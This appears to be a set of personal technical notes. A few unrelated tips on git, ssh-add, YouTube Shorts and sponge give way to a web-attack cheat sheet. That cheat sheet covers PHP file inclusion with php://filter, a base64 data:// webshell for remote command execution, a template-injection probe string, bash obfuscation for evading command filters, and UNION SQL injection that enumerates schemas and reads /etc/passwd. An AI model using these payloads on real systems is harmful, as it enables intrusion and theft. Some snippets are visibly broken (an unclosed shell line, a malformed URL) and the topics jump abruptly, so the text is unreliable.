Example of how to see where commig.gpgsign is set and how it’s overridden/shadowed.
git config --list --show-origin --show-scope | grep commit.gpgsign
ssh-add --apple-use-keychain --apple-load-keychain ~/.ssh/id_ed25519
References
There’s no global setting to remove YouTube shorts, but I’ve found that by saying “not interested” to every one which pops up they’ve been removed from my feed.
Right now I’m not sure how long this will be in effect for, but it’s at least a temporary solution.
Reading and writing to the same file can in theory cause it to become truncated or corrupted so you can use sponge from moreutils to “soak up std out and write to a file” which ensures that the file is processed in entirety before redirecting the output back to the same file.
tail -r file.txt | sponge file.txt
Imagine a PHP file where you can perform LFI such as
curl http://example.com/vuln.php?lang=en.php
With a badly configured server and app you can use PHP read filters to get the full content
curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php
You can get a webshell or RCE if allow_url_include is enabled
curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami
The shell is <?php system($_GET['cmd'];
The following string can be used to test a large number of templating engines in one go:
$ { { < % [ % ' " } } % \ .
[!IMPORTANT] Remove the spaces between each character! I’ve included them here because it messes up rendering in some places!
Inserting noop characters
Quotes (even number of non-mixed) will be ignored by bash. $ c'a't becomes $ cat. Similar for $ c"a"t
Backslashing chars (other than \n etc, obs) will have no effect. $ c\at becomes $ cat.
Use the positional param character $ c$@at becomes $ cat
Manipulate the characters
$(rev<<<'tac') becomes cat. Experiment with other things like rot13.
Encode the command
$(base64 -d<<<"Y2F0Cg==") becomes cat
Whitespace
%0a: newline%20: space%09: tab${IFS}: Input Field Separators ↗️ (typically space, tab, newline)- bash bracket expansion:
{ls,-la}turns intols -la
Special characters
- forward slash:
echo ${PATH:0:1} - semicolon:
echo ${LS_COLORS:10:1} - pipe: try using
<<<
Shifting characters
This command will shift a letter one to the right echo $(tr '!-}' '"-~'<<<[). e.g. ~ becomes !.
shift_generator() {
local shift=$1
local char=$2
local second_start=$((33 + shift))
local second_end=$((33 + shift - 1))
printf "echo \$(tr '\\!-~' '"
printf '%b-~\\!-%b' "$(printf '\\%03o' $second_start)" "$(printf '\\%03o' $second_end)"
printf "'<<<'%s')\n" "$char"
}
# usage
shift_generator 1 "~"
Tooling
For more advanced obfuscation you can consider tools such as:
Using a UNION injection we can find out about a (MySQL/MariaDB) structure.
Here are some minimal examples. Remember to determine the correct number of columns 🌿
and match that. Also clearly remember to add WHERE clauses to these to narrow down the search.
Databases
UNION SELECT SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA;
Tables
UNION SELECT TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES;
Columns
UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;
Privileges
UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES
References
After enumerating user privileges 🌿
if you find one which has FILE you can use that to read files from the target.
UNION SELECT LOAD_FILE('/etc/passwd')